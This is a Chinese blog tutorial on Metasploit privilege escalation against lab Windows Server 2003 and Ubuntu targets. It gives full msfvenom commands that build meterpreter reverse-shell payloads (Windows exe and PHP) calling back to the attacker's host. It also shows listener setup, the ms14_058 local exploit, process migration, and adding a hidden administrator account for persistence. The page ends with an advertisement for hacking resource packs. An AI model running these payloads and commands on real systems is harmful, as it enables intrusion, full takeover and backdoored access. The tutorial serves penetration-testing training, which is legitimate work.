使用MSF进行提权(windows提权、linux提权、wesng使用

文章目录

  • ​​MSF Windows提权​​

  • ​​反弹shell​​

  • ​​提权​​

  • ​​END推荐阅读​​

  • ​​MSF Linux提权​​

  • ​​反弹shell​​

  • ​​补充wesng用法​​

Metasploit 是一个渗透框架,kali 内安装了,安装位置如下

/usr/share/metasploit-framework

选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化

主要作用:漏洞验证、漏洞利用、内网渗透等

MSF Windows提权

靶机:

  • Win server2003 + iis(已通过webshell拿到低权限用户)
  • IP:192.168.179.143

攻击机:

  • Kali Linux
  • IP:192.168.179.128

反弹shell

  1. 使用msf生成payload
    在Kali中输入命令进入msf
msfconsole

生成payload

msfvenom  -p windows/meterpreter/reverse\_tcp lhost=192.168.179.128  
 lport=12345 -f exe >/var/www/html/s.exe  
  
\# lhost 是kali的ip  
\# lport 是kali监听端口

使用MSF进行提权(windows提权、linux提权、wesng使用)_metasploit_02

将刚才生成的 s.exe 文件上传到服务器(靶机)C:\RECYCLER\s.exe 目录(因为一般C:\RECYCLER\ 目录都有读写权限)

  1. kali 开启本地监听
use exploit/multi/handler  
set payload windows/meterpreter/reverse\_tcp  
set lhost 192.168.179.128  
set lport 12345  
exploit

使用命令可以查看配置情况

show options

使用MSF进行提权(windows提权、linux提权、wesng使用)_提权_03

使用MSF进行提权(windows提权、linux提权、wesng使用)_提权_04

  1. 使用webshell执行上传的s.exe文件,发现缺少对象,在windows提权篇说过,这种情况需要上传一个版本匹配的cmd.exe文件到c:\recycler目录

执行接收到反弹shell(截图端口有误应为12345)

使用MSF进行提权(windows提权、linux提权、wesng使用)_metasploit_05

发现只是一个iis用户,需要进行提权操作

提权

Windows 提权 exp 存储文件夹路径

/usr/share/metasploit-framework# cd modules/exploits/windows/local/

常见的提权模块如下:

  1. ms14_058 内核模式驱动程序中的漏洞库能允许远程代码执行
  2. ms16_016 WebDAV 本地提权漏洞(CVE-2016-0051)
  3. ms16_032 MS16-032 Secondary Logon Handle 本地提权漏洞

常用提权命令

  1. sysinfo 查看系统命令
  2. migrate 注入进程
  3. getuid 获取当前用户
  4. getprivs 尽可能提升权限
  5. getsystem 通过各种攻击向量来提升系统用户权限

可以先使用 getsystem 来自动提权,如果失败再手动提权

基础命令

  1. ps 列出进程
  2. sessions 查看会话
  3. background 把session放置后台
  4. sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
  5. interact id #切换进一个信道
  6. back 返回主界面
  7. shell 得到终端
  8. search搜索模块
  9. show 列模块
  10. info 查看模块信息

接下来进行具体提权过程:

  1. 利用getuid命令查看已经获得的权限,可以看到现在的权限很低,是个user权限(或者进入shell 使用whoami命令查看)。尝试利用getsystem提权,失败
  2. 输入命令shell进入目标机CMD命令行,再利用systeminfo命令或者通过查询 c:\windows\ 里留下的补丁号.log来看看目标机大概打了哪些补丁
    使用 ​​wesng​工具查看缺失补丁或者使用以下两个网站

安全焦点,其BugTraq是一个出色的漏洞和exploit数据源,可以通过CVE编号,或者产品信息漏洞直接搜索。网址:http://www.securityfocus.com/bid。
Exploit-DB,取代了老牌安全网站milw0rm。不断更新大量的Exploit程序和报告,它的搜索功能可以搜索整个网站内容。网址:​​​http://www.exploit-db.com。​

  1. 使用命令查找
python .\\wes.py -m .\\systeminfo.txt

使用MSF进行提权(windows提权、linux提权、wesng使用)_metasploit_06

发现很多补丁都没有打

  1. 输入命令background,就是把当前的metasploit shell转为后台执行
    使用命令搜索模块
search ms14\_058

使用MSF进行提权(windows提权、linux提权、wesng使用)_安全_07

查看模块信息

exploit/windows/local/ms14\_058\_track\_popup\_menu

基础选项中看到需要设置一个session

使用MSF进行提权(windows提权、linux提权、wesng使用)_web安全_08

use exploit/windows/local/ms14\_058\_track\_popup\_menu

使用MSF进行提权(windows提权、linux提权、wesng使用)_安全_09

设置session为刚才back的,使用sessions命令查看id

使用MSF进行提权(windows提权、linux提权、wesng使用)_web安全_10

设置session

set SESSION 3

使用MSF进行提权(windows提权、linux提权、wesng使用)_提权_11

提权成功

保持权限

使用ps命令列出进程

migrate pid 注入explorer 进程

增加超级管理员

net user ocean$ ocean123 /add   
net localground administrators ocean$ /add

在kali里面链接远程终端

rdesktop 192.168.179.128

END推荐阅读

MSF Windows提权 ​​https://xz.aliyun.com/t/258​

MSF命令 ​​https://zhuanlan.zhihu.com/p/137061194​

MSF Linux提权

方法和windows是一致的

靶机:

  • ubuntu14.04
  • IP:192.168.179.146

攻击机:

  • Kali Linux
  • IP:192.168.179.128

反弹shell

经过测试web中存在文件上传漏洞,然后上传了一句话木马,使用蚁剑链接成功

使用MSF生成payload

msfvenom -p php/meterpreter\_reverse\_tcp LHOST=192.168.179.128 LPORT=12345 -f raw > /var/www/html/shell.php

开启监听

use exploit/multi/handler  
set payload php/meterpreter\_reverse\_tcp   
set lhost 192.168.179.128  
set lport 12345  
exploit

再蚁剑上传shell.php到web目录再浏览器访问

http://192.168.179.146/upload/shell.php

kali接收到反弹的shell

使用MSF进行提权(windows提权、linux提权、wesng使用)_安全_12

权限为www-data

使用MSF进行提权(windows提权、linux提权、wesng使用)_web安全_13

msf对于Linux提权方式不是很多,还是以手工提权为主

补充wesng用法

项目地址:https://github.com/bitsadmin/wesng

  1. 将wesng下载到本地主机上,先升级最新的漏洞数据库
python wes.py --update

使用MSF进行提权(windows提权、linux提权、wesng使用)_metasploit_14

  1. 将目标机器的systeminfo命令的结果输出并保存,使用wesng进行检查
python .\\wes.py .\\systeminfo.txt

使用MSF进行提权(windows提权、linux提权、wesng使用)_web安全_15

如果提示txt文件中有缺失,可以加参数指定系统版本

\-m .\\systeminfo.txt --os "winserver 2008 r2"

wesng也可以对数据进行过滤

如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣,这将非常有用。为此,可以分别使用​​--impact "Remote Code Execution"​​​(shorthand: ​​-i​​​) 和​​--exploits-only​​​(shorthand: ​​-e​​​) 参数,使用​​--severity​​​(简写:)​​-s​​参数可以仅列出具有特定严重性的结果

支持使用​​--output​​​(shorthand: ​​-o​​​) 参数将结果以 CSV 格式存储到磁盘

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习资源分享:

最后给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

【点击领取】网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。【点击领取视频教程】

在这里插入图片描述

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】

在这里插入图片描述

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值